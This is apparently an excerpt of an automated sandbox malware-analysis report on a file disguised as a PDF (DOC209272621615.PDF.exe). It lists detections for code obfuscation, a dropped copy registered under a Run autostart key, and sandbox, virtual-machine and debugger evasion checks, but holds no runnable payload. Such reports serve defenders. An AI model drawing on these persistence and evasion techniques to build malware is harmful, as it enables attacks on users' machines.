Source: Binary string: rundll32.pdb source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: logagent.exe, 00000007.00000002.434750014.00000000049A0000.00000040.00020000.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source: Binary string: a7~winmm.pdb source: WerFault.exe, 00000005.00000003.304269089.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303618478.0000000004F5E000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304006492.0000000004F64000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.304486310.0000000004F64000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: logagent.pdb source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source: Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.303898040.0000000004EE0000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp
Source: Binary string: logagent.pdbGCTL source: rundll32.exe, 00000012.00000002.811265717.00000000004C4000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000002.817526950.0000000004BC7000.00000004.00020000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.310687968.0000000005351000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret) Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_004600AC push 00460125h; ret 0_2_0046011D
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_004605D0 push 0046065Dh; ret 0_2_00460655
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0041606E push 004160E6h; ret 0_2_004160DE
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_00416070 push 004160E6h; ret 0_2_004160DE
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_00460144 push 004601ECh; ret 0_2_004601E4
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0040E114 push 0040E29Ah; ret 0_2_0040E292
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_004601F8 push 00460288h; ret 0_2_00460280
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0044A2F0 push ecx; mov dword ptr [esp], edx 0_2_0044A2F4
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_00420280 push ecx; mov dword ptr [esp], edx 0_2_00420282
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0042E3D0 push 0042E41Ch; ret 0_2_0042E414
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0041645C push ecx; mov dword ptr [esp], ecx 0_2_0041645F
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0041643C push ecx; mov dword ptr [esp], ecx 0_2_0041643F
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0044A594 push ecx; mov dword ptr [esp], edx 0_2_0044A598
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004600AC push 00460125h; ret 6_2_0046011D
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004605D0 push 0046065Dh; ret 6_2_00460655
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0041606E push 004160E6h; ret 6_2_004160DE
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00416070 push 004160E6h; ret 6_2_004160DE
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00460144 push 004601ECh; ret 6_2_004601E4
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0040E114 push 0040E29Ah; ret 6_2_0040E292
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004601F8 push 00460288h; ret 6_2_00460280
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0044A2F0 push ecx; mov dword ptr [esp], edx 6_2_0044A2F4
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00420280 push ecx; mov dword ptr [esp], edx 6_2_00420282
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0042E3D0 push 0042E41Ch; ret 6_2_0042E414
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0041645C push ecx; mov dword ptr [esp], ecx 6_2_0041645F
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0041643C push ecx; mov dword ptr [esp], ecx 6_2_0041643F
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0044A594 push ecx; mov dword ptr [esp], edx 6_2_0044A598
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0045E634 push 0045E6B1h; ret 6_2_0045E6A9
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00458734 push 0045878Eh; ret 6_2_00458786
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004607CC push 00460834h; ret 6_2_0046082C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0040679E push 004067FBh; ret 6_2_004067F3
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004067A0 push 004067FBh; ret 6_2_004067F3
Contains functionality to dynamically determine API calls Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0045ED90 LoadLibraryA,GetProcAddress, 0_2_0045ED90

Persistence and Installation Behavior:

Drops PE files Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe File created: C:\Users\user\Contacts\Wkklnmcz.exe Jump to dropped file

Boot Survival:

Creates an autostart registry key Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Wkklnmcz Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension) Show sources
Source: Possible double extension: pdf.exe Static PE information: DOC209272621615.PDF.exe
Contains functionality to check if a window is minimized (may be used to check if an application is visible) Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 6_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_0045676C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 6_2_0045676C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00442700 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 6_2_00442700
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00456830 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 6_2_00456830
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00452B78 SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 6_2_00452B78
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00422EE0 IsIconic,GetWindowPlacement,GetWindowRect, 6_2_00422EE0
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004414CC IsIconic,GetCapture, 6_2_004414CC
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00441DD4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 6_2_00441DD4
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_0045603C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 10_2_0045603C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_0045676C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 10_2_0045676C
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00442700 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 10_2_00442700
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00456830 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 10_2_00456830
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00452B78 SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 10_2_00452B78
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00422EE0 IsIconic,GetWindowPlacement,GetWindowRect, 10_2_00422EE0
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_004414CC IsIconic,GetCapture, 10_2_004414CC
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00441DD4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 10_2_00441DD4
Extensive use of GetProcAddress (often used to hide API calls) Show sources
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_004474DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 6_2_004474DC
Disables application error messages (SetErrorMode) Show sources
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements Show sources
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mobsync.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mobsync.exe RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002E98604 second address: 0000000002E9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002E9899E second address: 0000000002E989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 0000000003458604 second address: 000000000345860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000345899E second address: 00000000034589A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis Show sources
Source: C:\Windows\explorer.exe TID: 7008 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion) Show sources
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers Show sources
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F6DE6 rdtsc 7_2_010F6DE6
Contains functionality to detect sandboxes (mouse cursor move detection) Show sources
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 6_2_004552FC
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 10_2_004552FC
Queries a list of all running processes Show sources
Source: C:\Windows\SysWOW64\logagent.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to enumerate / list files inside a directory Show sources
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 6_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 6_2_00405CBC
Source: C:\Users\user\Contacts\Wkklnmcz.exe Code function: 10_2_00405CBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 10_2_00405CBC
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) Show sources
Source: explorer.exe, 00000009.00000000.386760657.00000000047D0000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.355102319.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000009.00000000.346471893.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WerFault.exe, 00000005.00000002.329804705.0000000004DD0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(=
Source: explorer.exe, 00000009.00000000.346471893.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: DOC209272621615.PDF.exe, 00000000.00000000.296304584.0000000000794000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294280203.0000000000769000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000002.331410087.0000000000769000.00000004.00000020.sdmp, WerFault.exe, 00000005.00000002.329918378.0000000004E0D000.00000004.00000001.sdmp, Wkklnmcz.exe, 0000000A.00000002.350293403.000000000076F000.00000004.00000020.sdmp, rundll32.exe, 00000012.00000003.791240894.0000000000529000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000003.791257315.00000000004F3000.00000004.00000001.sdmp, rundll32.exe, 00000012.00000002.811474561.00000000004F4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000005.00000002.329918378.0000000004E0D000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWheduler-0000
Source: explorer.exe, 00000009.00000000.375047296.000000000EFE4000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000009.00000000.370886722.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging:

Contains functionality to dynamically determine API calls Show sources
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe Code function: 0_2_0045ED90 LoadLibraryA,GetProcAddress, 0_2_0045ED90
Contains functionality for execution timing, often used to detect debuggers Show sources
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F6DE6 rdtsc 7_2_010F6DE6
Contains functionality to read the PEB Show sources
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B9100 mov eax, dword ptr fs:[00000030h] 7_2_010B9100
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0113A537 mov eax, dword ptr fs:[00000030h] 7_2_0113A537
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01188D34 mov eax, dword ptr fs:[00000030h] 7_2_01188D34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D4120 mov eax, dword ptr fs:[00000030h] 7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D4120 mov ecx, dword ptr fs:[00000030h] 7_2_010D4120
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E513A mov eax, dword ptr fs:[00000030h] 7_2_010E513A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E4D3B mov eax, dword ptr fs:[00000030h] 7_2_010E4D3B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010C3D34 mov eax, dword ptr fs:[00000030h] 7_2_010C3D34
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BAD30 mov eax, dword ptr fs:[00000030h] 7_2_010BAD30
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DB944 mov eax, dword ptr fs:[00000030h] 7_2_010DB944
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DB944 mov eax, dword ptr fs:[00000030h] 7_2_010DB944
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010F3D43 mov eax, dword ptr fs:[00000030h] 7_2_010F3D43
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01133540 mov eax, dword ptr fs:[00000030h] 7_2_01133540
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010D7D50 mov eax, dword ptr fs:[00000030h] 7_2_010D7D50
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BC962 mov eax, dword ptr fs:[00000030h] 7_2_010BC962
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BB171 mov eax, dword ptr fs:[00000030h] 7_2_010BB171
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BB171 mov eax, dword ptr fs:[00000030h] 7_2_010BB171
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DC577 mov eax, dword ptr fs:[00000030h] 7_2_010DC577
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DC577 mov eax, dword ptr fs:[00000030h] 7_2_010DC577
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h] 7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h] 7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h] 7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h] 7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010B2D8A mov eax, dword ptr fs:[00000030h] 7_2_010B2D8A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EA185 mov eax, dword ptr fs:[00000030h] 7_2_010EA185
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010DC182 mov eax, dword ptr fs:[00000030h] 7_2_010DC182
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h] 7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h] 7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h] 7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2581 mov eax, dword ptr fs:[00000030h] 7_2_010E2581
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EFD9B mov eax, dword ptr fs:[00000030h] 7_2_010EFD9B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010EFD9B mov eax, dword ptr fs:[00000030h] 7_2_010EFD9B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E2990 mov eax, dword ptr fs:[00000030h] 7_2_010E2990
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h] 7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h] 7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h] 7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011351BE mov eax, dword ptr fs:[00000030h] 7_2_011351BE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E61A0 mov eax, dword ptr fs:[00000030h] 7_2_010E61A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E61A0 mov eax, dword ptr fs:[00000030h] 7_2_010E61A0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E35A1 mov eax, dword ptr fs:[00000030h] 7_2_010E35A1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011805AC mov eax, dword ptr fs:[00000030h] 7_2_011805AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011805AC mov eax, dword ptr fs:[00000030h] 7_2_011805AC
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011369A6 mov eax, dword ptr fs:[00000030h] 7_2_011369A6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h] 7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h] 7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010E1DB5 mov eax, dword ptr fs:[00000030h] 7_2_010E1DB5
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov ecx, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136DC9 mov eax, dword ptr fs:[00000030h] 7_2_01136DC9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01168DF1 mov eax, dword ptr fs:[00000030h] 7_2_01168DF1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h] 7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h] 7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010BB1E1 mov eax, dword ptr fs:[00000030h] 7_2_010BB1E1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CD5E0 mov eax, dword ptr fs:[00000030h] 7_2_010CD5E0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_010CD5E0 mov eax, dword ptr fs:[00000030h] 7_2_010CD5E0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_011441E8 mov eax, dword ptr fs:[00000030h] 7_2_011441E8
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h] 7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h] 7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01137016 mov eax, dword ptr fs:[00000030h] 7_2_01137016
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01184015 mov eax, dword ptr fs:[00000030h] 7_2_01184015
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01184015 mov eax, dword ptr fs:[00000030h] 7_2_01184015
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01171C06 mov eax, dword ptr fs:[00000030h] 7_2_01171C06
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h] 7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h] 7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_0118740D mov eax, dword ptr fs:[00000030h] 7_2_0118740D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h] 7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h] 7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h] 7_2_01136C0A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 7_2_01136C0A mov eax, dword ptr fs:[00000030h] 7_2_01136C0A
